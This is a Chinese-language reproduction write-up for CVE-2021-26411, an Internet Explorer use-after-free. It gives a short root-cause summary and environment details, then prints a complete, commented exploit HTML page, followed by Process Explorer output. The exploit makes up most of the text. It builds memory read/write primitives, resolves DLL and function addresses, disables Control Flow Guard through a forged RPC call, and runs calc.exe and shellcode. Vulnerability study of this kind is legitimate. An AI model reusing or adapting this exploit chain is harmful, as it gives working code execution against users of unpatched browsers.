CVE-2021-26411复现,学习JavaScript之POC源码分析
概述
CVE-2021-26411,该漏洞的原因:removeAttributeNode()触发属性对象nodeValue的valueOf回调,回调期间手动调用clearAttributes(),导致nodeValue保存的BSTR被提前释放。回调返回后,没有检查nodeValue是否存在继续使用该对象,最终导致UAF(Use After Free)。
参考分析链接
国内链接
CVE-2021-26411在野样本中利用RPC绕过CFG缓解技术的研究 (qq.com)
IE浏览器在野0Day CVE-2021-26411漏洞分析 (qq.com)
原作者链接
https://enki.co.kr/blog/2021/02/04/ie_0day.html
平台环境
Win10 1809 17763 ==》 下载地址:https://hellowindows.cn/
商业-批量版 64位 2019-09-17 发布
文件:cn_windows_10_business_editions_version_1809_updated_sept_2019_x64_dvd_f873d037.iso 我是下载的这个版本复现
大小:5.07GB
SHA1:975f1b3acbeece56b5ad1526345a0657109f4043
VmWare 16.1.1 build-17801498
复现效果展示
POC源码
<!-- IE Double Free 1Day Poc -->
<!doctype html>
<html lang="zh-cmn-Hans">
<head>
<meta http-equiv="Cache-Control" content="no-cache">
</head>
<body>
<script language="javascript">
// 重复字符串
String.prototype.repeat = function (size) { return new Array(size + 1).join(this) }
function pad0(str) {
// 提取倒数第四个字符开始的字符串,效果就是补0
return ('0000' + str).slice(-4)
}
// Access of Resource Using Incompatible Type ('Type Confusion')
function alloc1() {
// DataView 视图是一个可以从 二进制ArrayBuffer 对象中读写多种数值类型的底层接口,使用它时,不用考虑不同平台的字节序问题。
var view = new DataView(abf)
var str = ''
for (var i = 4; i < abf.byteLength - 2; i += 2)
str += '%u' + pad0(view.getUint16(i, true).toString(16))
// 创建并返回一个新的属性节点
var result = document.createAttribute('alloc')
// 对escape()编码的字符串进行解码
result.nodeValue = unescape(str)
return result
}
function alloc2() {
// 创建字典对象
var dic1 = new ActiveXObject('Scripting.Dictionary')
var dic2 = new ActiveXObject('Scripting.Dictionary')
// 增加新项,dic.add(key,value)
dic2.add(0, 1)
dic1.add(0, dic2.items())
dic1.add(1, fake)
dic1.add(2, arr)
for (i = 3; i < 0x20010 / 0x10; ++i)
dic1.add(i, 0x12341234)
return dic1.items()
}
function dump(nv) {
// ArrayBuffer 对象用来表示通用的、固定长度的原始二进制数据缓冲区。
// 创建一个0x20010字节的缓冲区,并使用一个 DataView 来引用它
var ab = new ArrayBuffer(0x20010)
var view = new DataView(ab)
for (var i = 0; i < nv.length; ++i)
view.setUint16(i * 2 + 4, nv.charCodeAt(i), true)
return ab
}
// 在原型对象上定义属性
function Data(type, value) {
this.type = type
this.value = value
}
function setData(i, data) {
var arr = new Uint32Array(abf)
arr[i * 4] = data.type
arr[i * 4 + 2] = data.value
}
function flush() {
hd1.nodeValue = (new alloc1()).nodeValue
hd2.nodeValue = 0
// 返回调用该方法的节点的一个副本.
hd2 = hd1.cloneNode()
}
// 小端序读取
function read(addr, size) {
switch (size) {
case 8:
return god.getUint8(addr)
case 16:
// getUint16(byteOffset [, littleEndian])
return god.getUint16(addr, true)
case 32:
return god.getUint32(addr, true)
}
}
function write(addr, value, size) {
switch (size) {
case 8:
return god.setUint8(addr, value)
case 16:
return god.setUint16(addr, value, true)
case 32:
return god.setUint32(addr, value, true)
}
}
function writeData(addr, data) {
for (var i = 0; i < data.length; ++i)
write(addr + i, data[i], 8)
}
function addrOf(obj) {
arr[0] = obj
return read(pArr, 32)
}
function strcmp(str1, str2) {
// typeof 操作符返回一个字符串,表示未经计算的操作数的类型。
str1 = (typeof str1 == 'string') ? str1 : toStr(str1)
str2 = (typeof str2 == 'string') ? str2 : toStr(str2)
return str1.toLowerCase() == str2.toLowerCase()
}
function memcpy(dst, src, size) {
for (var i = 0; i < size; ++i)
write(dst + i, read(src + i, 8), 8)
}
function toStr(addr) {
var str = ''
while (true) {
var c = read(addr, 8)
// 遇到终结符就退出循环
if (c == 0) break
// 返回由指定的 UTF-16 代码单元序列创建的字符串
str += String.fromCharCode(c)
addr++
}
return str
}
function newStr(str) {
var buffer = createArrayBuffer(str.length + 1)
for (var i = 0; i < str.length; ++i) write(buffer + i, str.charCodeAt(i), 8)
// 写入字符串终结符
write(buffer + i, 0, 8)
return buffer
}
// PE文件相关操作函数
function getDllBase(base, name) {
var tmpValue = 0
var index = 0
var iat = base + read(base + read(base + 60, 32) + 128, 32)
while (true) {
var offset = read(iat + index * 20 + 12, 32)
if (strcmp(base + offset, name)) break
index++
}
var addr = read(iat + index * 20 + 16, 32)
return getBase(read(base + addr, 32))
}
function getBase(addr) {
var addr = addr & 0xffff0000
while (true) {
if (isMZ(addr) && isPE(addr)) break
addr -= 0x10000
}
return addr
}
function isMZ(addr) {
return read(addr, 16) == 0x5a4d
}
function isPE(addr) {
var sizeOfHeaders = read(addr + 60, 32)
if (sizeOfHeaders > 0x600) return null
var addr = addr + sizeOfHeaders
if (read(addr, 32) != 0x4550) return null
return addr
}
function winVer() {
// 返回浏览器的平台和版本信息
var appVersion = window.navigator.appVersion
var ver = 0
// 检测一个字符串是否匹配某个模式,javaScript正则表达式
if (/(Windows 10.0|Windows NT 10.0)/.test(appVersion)) {
ver = 100
} else if (/(Windows 8.1|Windows NT 6.3)/.test(appVersion)) {
ver = 81
} else if (/(Windows 8|Windows NT 6.2)/.test(appVersion)) {
ver = 80
} else {
ver = 70
}
return ver
}
function createArrayBuffer(size) {
var ab = new ArrayBuffer(size)
var bs = read(addrOf(ab) + 0x1c, 32)
// 设置键值对
map.set(bs, ab)
return bs
}
function getProcAddr(addr, name) {
var eat = addr + read(addr + read(addr + 0x3c, 32) + 0x78, 32)
var non = read(eat + 0x18, 32)
var aof = addr + read(eat + 0x1c, 32)
var aon = addr + read(eat + 0x20, 32)
var aono = addr + read(eat + 0x24, 32)
for (var i = 0; i < non; ++i) {
var offset = read(aon + i * 4, 32)
if (strcmp(addr + offset, name)) break
}
var offset = read(aono + i * 2, 16)
return addr + read(aof + offset * 4, 32)
}
function readyRpcCall(func) {
var PRPC_CLIENT_INTERFACE_Buffer = _RPC_MESSAGE.get(msg, 'RpcInterfaceInformation')
var _MIDL_SERVER_INFO_Buffer = PRPC_CLIENT_INTERFACE.get(PRPC_CLIENT_INTERFACE_Buffer, 'InterpreterInfo')
var RPC_DISPATCH_TABLE_Buffer = _MIDL_SERVER_INFO_.get(_MIDL_SERVER_INFO_Buffer, 'DispatchTable')
write(RPC_DISPATCH_TABLE_Buffer, func, 32)
}
function setArgs(args) {
var buffer = createArrayBuffer(48)
for (var i = 0; i < args.length; ++i) {
write(buffer + i * 4, args[i], 32)
}
_RPC_MESSAGE.set(msg, 'Buffer', buffer)
_RPC_MESSAGE.set(msg, 'BufferLength', 48)
_RPC_MESSAGE.set(msg, 'RpcFlags', 0x1000)
return buffer
}
function callRpcFreeBufferImpl() {
var buffer = _RPC_MESSAGE.get(msg, 'Buffer')
_RPC_MESSAGE.set(rpcFree, 'Buffer', buffer)
return call(rpcFree)
}
function callRpcFreeBuffer() {
var buffer = _RPC_MESSAGE.get(msg, 'Buffer')
var result = read(buffer, 32)
callRpcFreeBufferImpl()
return result
}
function call2(func, args) {
readyRpcCall(func)
var buffer = setArgs(args)
call(msg)
map.delete(buffer)
return callRpcFreeBuffer()
}
function call(addr) {
var result = 0
write(paoi + 0x18, addr, 32)
// 错误处理
try {
// rpcrt4!NdrServerCall2
xyz.normalize()
} catch (error) {
result = error.number
}
write(paoi + 0x18, patt, 32)
return result
}
function prepareCall(addr, func) {
var buf = createArrayBuffer(cattr.size())
var vft = read(patt, 32)
memcpy(addr, patt, cbase.size())
memcpy(buf, vft, cattr.size())
cbase.set(addr, 'pvftable', buf)
cattr.set(buf, 'normalize', func)
}
function createBase() {
var isWin7 = winVer() == 70
var size = isWin7 ? 560 : 572
var offset = isWin7 ? 540 : 548
var addr1 = createArrayBuffer(size + cbase.size())
var addr2 = createArrayBuffer(48)
write(addr1 + offset, addr2, 32)
write(addr2 + 40, 8, 32)
write(addr2 + 36, 8, 32)
return {
size: size,
addr: addr1
}
}
function aos() {
var baseObj = createBase()
var addr = baseObj.addr + baseObj.size
var I_RpcTransServerNewConnection = getProcAddr(rpcrt4, 'I_RpcTransServerNewConnection')
prepareCall(addr, I_RpcTransServerNewConnection)
return read(read(call(addr)-0xf8, 32), 32)
}
// 自定义结构体的操作
function SymTab(size, sym) {
this.size = function() {
return size
}
this.set = function(addr, name, value) {
var o = sym[name]
write(addr + o.offset, value, o.size)
}
this.get = function(addr, name) {
var o = sym[name]
return read(addr + o.offset, o.size)
}
}
// 构造RPC
function initRpc() {
var data = [50,72,0,0,0,0,0,0,52,0,192,0,16,0,68,13,10,1,0,0,0,0,0,0,0,0,72,0,0,0,9,0,72,0,4,0,9,0,72,0,8,0,9,0,72,0,12,0,9,0,72,0,16,0,9,0,72,0,20,0,9,0,72,0,24,0,9,0,72,0,28,0,9,0,72,0,32,0,9,0,72,0,36,0,9,0,72,0,40,0,9,0,72,0,44,0,9,0,112,0,48,0,9,0,0]
var NdrServerCall2 = getProcAddr(rpcrt4, 'NdrServerCall2')
var NdrOleAllocate = getProcAddr(rpcrt4, 'NdrOleAllocate')
var NdrOleFree = getProcAddr(rpcrt4, 'NdrOleFree')
var RPCMessageObject = createArrayBuffer(cbase.size())
var buffer = createArrayBuffer(0x100)
var buffer2 = createArrayBuffer(0x200)
var AttributeVtable = read(patt, 32)
var MSHTMLSymbolBuffer = createArrayBuffer(0x1000)
var TransferSyntaxBuffer = createArrayBuffer(syntaxObject.size())
var PRPC_CLIENT_INTERFACE_Buffer = createArrayBuffer(PRPC_CLIENT_INTERFACE.size())
var _MIDL_SERVER_INFO_Buffer = createArrayBuffer(_MIDL_SERVER_INFO_.size())
var rpcProcStringBuffer = createArrayBuffer(data.length)
writeData(rpcProcStringBuffer, data)
var _MIDL_STUB_DESC_Buffer = createArrayBuffer(_MIDL_STUB_DESC.size())
var RPC_DISPATCH_TABLE_Buffer = createArrayBuffer(RPC_DISPATCH_TABLE.size())
var NdrServerCall2Buffer = createArrayBuffer(4)
write(NdrServerCall2Buffer, NdrServerCall2, 32)
write(MSHTMLSymbolBuffer, osf_vft, 32)
write(MSHTMLSymbolBuffer + 4, 0x89abcdef, 32)
write(MSHTMLSymbolBuffer + 8, 0x40, 32)
cattr.set(MSHTMLSymbolBuffer, '__vtguard', cattr.get(AttributeVtable, '__vtguard'))
cattr.set(MSHTMLSymbolBuffer, 'SecurityContext', cattr.get(AttributeVtable, 'SecurityContext'))
cattr.set(MSHTMLSymbolBuffer, 'JSBind_InstanceOf', cattr.get(AttributeVtable, 'JSBind_InstanceOf'))
cattr.set(MSHTMLSymbolBuffer, 'JSBind_TypeId', cattr.get(AttributeVtable, 'JSBind_TypeId'))
cattr.set(MSHTMLSymbolBuffer, 'normalize', NdrServerCall2)
cbase.set(RPCMessageObject, 'pSecurityContext', RPCMessageObject + 68)
write(RPCMessageObject + 76, 1, 32)
syntaxObject.set(TransferSyntaxBuffer, 'SyntaxVersion.MajorVersion', 2)
_MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'RpcInterfaceInformation', PRPC_CLIENT_INTERFACE_Buffer)
_MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'pfnAllocate', NdrOleAllocate)
_MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'pfnFree', NdrOleFree)
_MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'pFormatTypes', buffer2)
_MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'fCheckBounds', 1)
_MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'Version', 0x50002)
_MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'MIDLVersion', 0x800025b)
_MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'mFlags', 1)
_MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, 'pStubDesc', _MIDL_STUB_DESC_Buffer)
_MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, 'DispatchTable', createArrayBuffer(32))
_MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, 'ProcString', rpcProcStringBuffer)
_MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, 'FmtStringOffset', buffer2)
RPC_DISPATCH_TABLE.set(RPC_DISPATCH_TABLE_Buffer, 'DispatchTableCount', 1)
RPC_DISPATCH_TABLE.set(RPC_DISPATCH_TABLE_Buffer, 'DispatchTable', NdrServerCall2Buffer)
PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'DispatchTable', RPC_DISPATCH_TABLE_Buffer)
PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'InterpreterInfo', _MIDL_SERVER_INFO_Buffer)
PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'Length', PRPC_CLIENT_INTERFACE.size())
PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'InterfaceId.SyntaxVersion.MajorVersion', 1)
PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'TransferSyntax.SyntaxVersion.MajorVersion', 2)
PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'Flags', 0x4000000)
_RPC_MESSAGE.set(RPCMessageObject, 'RpcInterfaceInformation', PRPC_CLIENT_INTERFACE_Buffer)
_RPC_MESSAGE.set(RPCMessageObject, 'TransferSyntax', TransferSyntaxBuffer)
_RPC_MESSAGE.set(RPCMessageObject, 'Handle', MSHTMLSymbolBuffer)
_RPC_MESSAGE.set(RPCMessageObject, 'DataRepresentation', 16)
_RPC_MESSAGE.set(RPCMessageObject, 'RpcFlags', 0x1000)
_RPC_MESSAGE.set(RPCMessageObject, 'Buffer', buffer)
_RPC_MESSAGE.set(RPCMessageObject, 'BufferLength', 48)
return RPCMessageObject
}
function rpcFree() {
var Cbase = createArrayBuffer(cbase.size())
var I_RpcFreeBuffer = getProcAddr(rpcrt4, 'I_RpcFreeBuffer')
var MSHTMLSymbolBuffer = createArrayBuffer(0x1000)
var AttributeVtable = read(patt, 32)
write(MSHTMLSymbolBuffer, osf_vft, 32)
write(MSHTMLSymbolBuffer + 4, 0x89abcdef, 32)
write(MSHTMLSymbolBuffer + 8, 64, 32)
cattr.set(MSHTMLSymbolBuffer, '__vtguard', cattr.get(AttributeVtable, '__vtguard'))
cattr.set(MSHTMLSymbolBuffer, 'SecurityContext', cattr.get(AttributeVtable, 'SecurityContext'))
cattr.set(MSHTMLSymbolBuffer, 'JSBind_InstanceOf', cattr.get(AttributeVtable, 'JSBind_InstanceOf'))
cattr.set(MSHTMLSymbolBuffer, 'JSBind_TypeId', cattr.get(AttributeVtable, 'JSBind_TypeId'))
cattr.set(MSHTMLSymbolBuffer, 'normalize', I_RpcFreeBuffer)
cbase.set(Cbase, 'pvftable', MSHTMLSymbolBuffer)
cbase.set(Cbase, 'pSecurityContext', Cbase + 68)
write(Cbase + 76, 1, 32)
return Cbase
}
function CFGObject(baseAddress) {
var PEAddr = isPE(baseAddress)
var eat = PEAddr + 120
var LOAD_CONFIG_DIRECTORY = baseAddress + read(eat + 0x50, 32)
var size = read(LOAD_CONFIG_DIRECTORY, 32)
var sizeOfImage = read(PEAddr + 0x50, 32)
var CFGSymbolTable = new SymTab(0x5c, {
'___guard_check_icall_fptr': {
offset: 72,
size: 32
}
})
var guard_check_icall_fptr_address = size < CFGSymbolTable.size() ? 0 : CFGSymbolTable.get(LOAD_CONFIG_DIRECTORY, '___guard_check_icall_fptr')
this.getCFGAddress = function() {
return guard_check_icall_fptr_address
}
this.getCFGValue = function() {
if (size < CFGSymbolTable.size()) return false
var currentCFGValue = read(guard_check_icall_fptr_address, 32)
var isValidAddress = (baseAddress < currentCFGValue) && (currentCFGValue < baseAddress + sizeOfImage)
return !isValidAddress;
}
}
function killCfg(addr) {
var cfgobj = new CFGObject(addr)
if (!cfgobj.getCFGValue()) return
var guard_check_icall_fptr_address = cfgobj.getCFGAddress()
var KiFastSystemCallRet = getProcAddr(ntdll, 'KiFastSystemCallRet')
var tmpBuffer = createArrayBuffer(4)
// 修改RPCRT4!__guard_check_icall_fptr的属性为PAGE_EXECUTE_READWRITE
call2(VirtualProtect, [guard_check_icall_fptr_address, 0x1000, 0x40, tmpBuffer])
// 替换rpcrt4!__guard_check_icall_fptr保存的指针,修改ntdll!LdrpValidateUserCallTarget为改为ntdll!KiFastSystemCallRet
// 关闭rpcrt4的CFG检查
write(guard_check_icall_fptr_address, KiFastSystemCallRet, 32)
// 恢复PRCRT4!__gurad_check_icall_fptr内存属性
call2(VirtualProtect, [guard_check_icall_fptr_address, 0x1000, read(tmpBuffer, 32), tmpBuffer])
map.delete(tmpBuffer)
}
// {} 表示对象
// 属性:属性值
var cbase = new SymTab(0x60, {
'pvftable': {
offset: 0x0,
size: 32
},
'pSecurityContext': {
offset: 0x44,
size: 32
}
})
var cattr = new SymTab(0x32c, {
'__vtguard': {
offset: 0x48,
size: 32
},
'SecurityContext': {
offset: 0xc8,
size: 32
},
'JSBind_TypeId': {
offset: 0x160,
size: 32
},
'JSBind_InstanceOf': {
offset: 0x164,
size: 32
},
'normalize': {
offset: 0x28c,
size: 32
}
})
var syntaxObject = new SymTab(0x14, {
'SyntaxVersion.MajorVersion': {
offset: 0x10,
size: 16
}
})
var PRPC_CLIENT_INTERFACE = new SymTab(0x44, {
'Length': {
offset: 0,
size: 32
},
'InterfaceId.SyntaxVersion.MajorVersion': {
offset: 20,
size: 16
},
'TransferSyntax.SyntaxVersion.MajorVersion': {
offset: 40,
size: 16
},
// 保存了runtime库和Stub函数的接口指针
'DispatchTable': {
offset: 44,
size: 32
},
// 指向MIDL_SERVER_INFO结构
'InterpreterInfo': {
offset: 60,
size: 32
},
'Flags': {
offset: 64,
size: 32
}
})
// 保存了服务端IDL接口信息
var _MIDL_SERVER_INFO_ = new SymTab(0x20, {
'pStubDesc': {
offset: 0,
size: 32
},
// 保存了服务端提供的远程调用例程的函数指针数组
'DispatchTable': {
offset: 4,
size: 32
},
'ProcString': {
offset: 8,
size: 32
},
'FmtStringOffset': {
offset: 12,
size: 32
}
})
var _MIDL_STUB_DESC = new SymTab(0x50, {
'RpcInterfaceInformation': {
offset: 0,
size: 32
},
'pfnAllocate': {
offset: 4,
size: 32
},
'pfnFree': {
offset: 8,
size: 32
},
'pFormatTypes': {
offset: 32,
size: 32
},
'fCheckBounds': {
offset: 36,
size: 32
},
'Version': {
offset: 40,
size: 32
},
'MIDLVersion': {
offset: 48,
size: 32
},
'mFlags': {
offset: 64,
size: 32
}
})
var RPC_DISPATCH_TABLE = new SymTab(12, {
'DispatchTableCount': {
offset: 0,
size: 32
},
'DispatchTable': {
offset: 4,
size: 32
},
})
var _RPC_MESSAGE = new SymTab(0x2c, {
'Handle': {
offset: 0,
size: 32
},
'DataRepresentation': {
offset: 4,
size: 32
},
// 存放函数的参数
'Buffer': {
offset: 8,
size: 32
},
'BufferLength': {
offset: 12,
size: 32
},
'TransferSyntax': {
offset: 20,
size: 32
},
// 指向RPC_SERVER_INTERFACE
'RpcInterfaceInformation': {
offset: 24,
size: 32
},
'RpcFlags': {
offset: 40,
size: 32
}
})
var god
// 对象数组
var arr = [{}]
var fake = new ArrayBuffer(0x100)
var abf = new ArrayBuffer(0x20010)
var alloc = alloc2()
// 创建一个HTML 属性对象
var hd0 = document.createAttribute('handle')
var hd1 = document.createAttribute('handle')
var hd2
// 创建一个HTML 元素对象
var ele = document.createElement('element')
var att = document.createAttribute('attribute')
att.nodeValue = {
valueOf: function() {
hd1.nodeValue = (new alloc1()).nodeValue
// 回调时,清除ele对象绑定的所有属性
ele.clearAttributes()
hd2 = hd1.cloneNode()
ele.setAttribute('attribute', 1337)
}
}
ele.setAttributeNode(att)
ele.setAttribute('attr', '0'.repeat((0x20010 - 6) / 2))
// 触发valueof函数回调
ele.removeAttributeNode(att)
hd0.nodeValue = alloc
var leak = new Uint32Array(dump(hd2.nodeValue))
var pAbf = leak[6]
var pArr = leak[10]
var VT_I4 = 0x3
var VT_DISPATCH = 0x9
var VT_BYREF = 0x4000
var bufArr = new Array(0x10)
var fakeArr = new Uint32Array(fake)
for (var i = 0; i < 0x10; ++i) setData(i + 1, new Data(VT_BYREF | VT_I4, pAbf + i * 4))
flush()
var ref = new VBArray(hd0.nodeValue)
for (var i = 0; i < 0x10; ++i) bufArr[i] = ref.getItem(i + 1)
ref = null
setData(1, new Data(VT_BYREF | VT_I4, bufArr[4]))
setData(2, new Data(VT_BYREF | VT_I4, bufArr[4] + 0x04))
setData(3, new Data(VT_BYREF | VT_I4, bufArr[4] + 0x1c))
flush()
ref = new VBArray(hd0.nodeValue)
var vt = ref.getItem(1)
var gc = ref.getItem(2)
var bs = ref.getItem(3)
ref = null
for (var i = 0; i < 16; ++i) fakeArr[i] = bufArr[i]
fakeArr[4] = bs + 0x40
fakeArr[16] = vt
fakeArr[17] = gc
fakeArr[24] = 0xffffffff
setData(1, new Data(VT_DISPATCH, bs))
flush()
ref = new VBArray(hd0.nodeValue)
god = new DataView(ref.getItem(1))
ref = null
pArr = read(read(pArr + 0x10, 32) + 0x14, 32) + 0x10
write(read(addrOf(hd0) + 0x18, 32) + 0x28, 0, 32)
var map = new Map()
var jscript9 = getBase(read(addrOf(map), 32))
var rpcrt4 = getDllBase(jscript9, 'rpcrt4.dll')
var msvcrt = getDllBase(jscript9, 'msvcrt.dll')
var ntdll = getDllBase(msvcrt, 'ntdll.dll')
var kernelbase = getDllBase(msvcrt, 'kernelbase.dll')
var VirtualProtect = getProcAddr(kernelbase, 'VirtualProtect')
var LoadLibraryExA = getProcAddr(kernelbase, 'LoadLibraryExA')
var xyz = document.createAttribute('xyz')
var paoi = addrOf(xyz)
var patt = read(addrOf(xyz) + 0x18, 32)
var osf_vft = aos()
var msg = initRpc()
var rpcFree = rpcFree()
killCfg(rpcrt4)
// 调用API,弹出计算器
var kernel32 = call2(LoadLibraryExA,[newStr('kernel32.dll',0,1)])
var WinExec = getProcAddr(kernel32,'WinExec')
call2(WinExec,[newStr('calc.exe'),5])
// 调用shellcode
var shellcode = new Uint8Array([0xb8, 0x37, 0x13, 0x00, 0x00, 0xc3])
var msi = call2(LoadLibraryExA, [newStr('msi.dll'), 0, 1]) + 0x5000
var tmpBuffer = createArrayBuffer(4)
call2(VirtualProtect, [msi, shellcode.length, 0x4, tmpBuffer])
writeData(msi, shellcode) // mov eax, 0x1337 ; ret
call2(VirtualProtect, [msi, shellcode.length, read(tmpBuffer, 32), tmpBuffer])
var result = call2(msi, [])
// 根据shellocde的而反汇编结果,这里会弹出0x1337的对话框
alert(result.toString(16))
</script>
</body>
</html>
注意细节:我是本地保存html,然后打开复现的,
C:\Users\bonelee\Desktop\1809.html
如果是放在服务器下运行然后访问,则不会弹出计算器。但是会有弹窗,如下:
我们使用proc exp采集下数据:
可以看到ie并没有calc的自进程!从其加载的dll里,可以看到有mshtml.dll!
可以看到是svchost出来的。
我们重点看下ie加载的dll清单:
Process: iexplore.exe Pid: 2280
Name Description Company Name Path
{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db
{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000001.db C:\Users\bonelee\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000001.db
{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db
advapi32.dll Advanced Windows 32 Base API Microsoft Corporation C:\Windows\SysWOW64\advapi32.dll
apphelp.dll 应用程序兼容性客户端库 Microsoft Corporation C:\Windows\SysWOW64\apphelp.dll
bcrypt.dll Windows Cryptographic Primitives Library (Wow64) Microsoft Corporation C:\Windows\SysWOW64\bcrypt.dll
bcryptprimitives.dll Windows Cryptographic Primitives Library Microsoft Corporation C:\Windows\SysWOW64\bcryptprimitives.dll
C_1252.NLS C:\Windows\System32\C_1252.NLS
cfgmgr32.dll Configuration Manager DLL Microsoft Corporation C:\Windows\SysWOW64\cfgmgr32.dll
clbcatq.dll COM+ Configuration Catalog Microsoft Corporation C:\Windows\SysWOW64\clbcatq.dll
combase.dll Microsoft COM for Windows Microsoft Corporation C:\Windows\SysWOW64\combase.dll
comctl32.dll 用户体验控件库 Microsoft Corporation C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll
comctl32.dll 用户体验控件库 Microsoft Corporation C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\comctl32.dll
comdlg32.dll Common Dialogs DLL Microsoft Corporation C:\Windows\SysWOW64\comdlg32.dll
coml2.dll Microsoft COM for Windows Microsoft Corporation C:\Windows\SysWOW64\coml2.dll
CoreMessaging.dll Microsoft CoreMessaging Dll Microsoft Corporation C:\Windows\SysWOW64\CoreMessaging.dll
CoreUIComponents.dll Microsoft Core UI Components Dll Microsoft Corporation C:\Windows\SysWOW64\CoreUIComponents.dll
crypt32.dll Crypto API32 Microsoft Corporation C:\Windows\SysWOW64\crypt32.dll
cryptbase.dll Base cryptographic API DLL Microsoft Corporation C:\Windows\SysWOW64\cryptbase.dll
cryptsp.dll Cryptographic Service Provider API Microsoft Corporation C:\Windows\SysWOW64\cryptsp.dll
cversions.2.db C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db
cversions.2.db C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db
d2d1.dll Microsoft D2D Library Microsoft Corporation C:\Windows\SysWOW64\d2d1.dll
d3d11.dll Direct3D 11 Runtime Microsoft Corporation C:\Windows\SysWOW64\d3d11.dll
DataExchange.dll Data exchange Microsoft Corporation C:\Windows\SysWOW64\DataExchange.dll
dcomp.dll Microsoft DirectComposition Library Microsoft Corporation C:\Windows\SysWOW64\dcomp.dll
directmanipulation.dll Microsoft Direct Manipulation Component Microsoft Corporation C:\Windows\SysWOW64\directmanipulation.dll
dwmapi.dll Microsoft Desktop Window Manager API Microsoft Corporation C:\Windows\SysWOW64\dwmapi.dll
DWrite.dll Microsoft DirectX Typography Services Microsoft Corporation C:\Windows\SysWOW64\DWrite.dll
dxgi.dll DirectX Graphics Infrastructure Microsoft Corporation C:\Windows\SysWOW64\dxgi.dll
efswrt.dll Storage Protection Windows Runtime DLL Microsoft Corporation C:\Windows\SysWOW64\efswrt.dll
gdi32.dll GDI Client DLL Microsoft Corporation C:\Windows\SysWOW64\gdi32.dll
gdi32full.dll GDI Client DLL Microsoft Corporation C:\Windows\SysWOW64\gdi32full.dll
ieapfltr.dll Microsoft SmartScreen Filter Microsoft Corporation C:\Windows\SysWOW64\ieapfltr.dll
ieframe.dll Internet 浏览器 Microsoft Corporation C:\Windows\SysWOW64\ieframe.dll
ieframe.dll.mui Internet 浏览器 Microsoft Corporation C:\Windows\System32\zh-CN\ieframe.dll.mui
ieproxy.dll IE ActiveX Interface Marshaling Library Microsoft Corporation C:\Windows\SysWOW64\ieproxy.dll
iertutil.dll Internet Explorer 的运行时实用程序 Microsoft Corporation C:\Windows\SysWOW64\iertutil.dll
IEShims.dll Internet Explorer Compatibility Shims Microsoft Corporation C:\Program Files (x86)\Internet Explorer\IEShims.dll
ieui.dll Internet Explorer UI 引擎 Microsoft Corporation C:\Windows\SysWOW64\ieui.dll
iexplore.exe Internet Explorer Microsoft Corporation C:\Program Files (x86)\Internet Explorer\iexplore.exe
iexplore.exe.mui Internet Explorer Microsoft Corporation C:\Program Files\internet explorer\zh-CN\iexplore.exe.mui
imageres.dll Windows Image Resource Microsoft Corporation C:\Windows\SysWOW64\imageres.dll
imageres.dll.mui Windows Image Resource Microsoft Corporation C:\Windows\System32\en-US\imageres.dll.mui
imm32.dll Multi-User Windows IMM32 API Client DLL Microsoft Corporation C:\Windows\SysWOW64\imm32.dll
IPHLPAPI.DLL IP Helper API Microsoft Corporation C:\Windows\SysWOW64\IPHLPAPI.DLL
jscript9.dll Microsoft (R) JScript Microsoft Corporation C:\Windows\SysWOW64\jscript9.dll
kernel.appcore.dll AppModel API Host Microsoft Corporation C:\Windows\SysWOW64\kernel.appcore.dll
kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation C:\Windows\SysWOW64\kernel32.dll
KernelBase.dll Windows NT BASE API Client DLL Microsoft Corporation C:\Windows\SysWOW64\KernelBase.dll
KernelBase.dll.mui Windows NT 基本 API 客户端 DLL Microsoft Corporation C:\Windows\System32\zh-CN\KernelBase.dll.mui
locale.nls C:\Windows\System32\locale.nls
mlang.dll Multi Language Support DLL Microsoft Corporation C:\Windows\SysWOW64\mlang.dll
mlang.dll.mui 多语言支持 DLL Microsoft Corporation C:\Windows\System32\zh-CN\mlang.dll.mui
mpr.dll Multiple Provider Router DLL Microsoft Corporation C:\Windows\SysWOW64\mpr.dll
msasn1.dll ASN.1 Runtime APIs Microsoft Corporation C:\Windows\SysWOW64\msasn1.dll
msctf.dll MSCTF Server DLL Microsoft Corporation C:\Windows\SysWOW64\msctf.dll
mshtml.dll Microsoft (R) HTML 查看器 Microsoft Corporation C:\Windows\SysWOW64\mshtml.dll
mshtml.dll.mui Microsoft (R) HTML 查看器 Microsoft Corporation C:\Windows\System32\zh-CN\mshtml.dll.mui
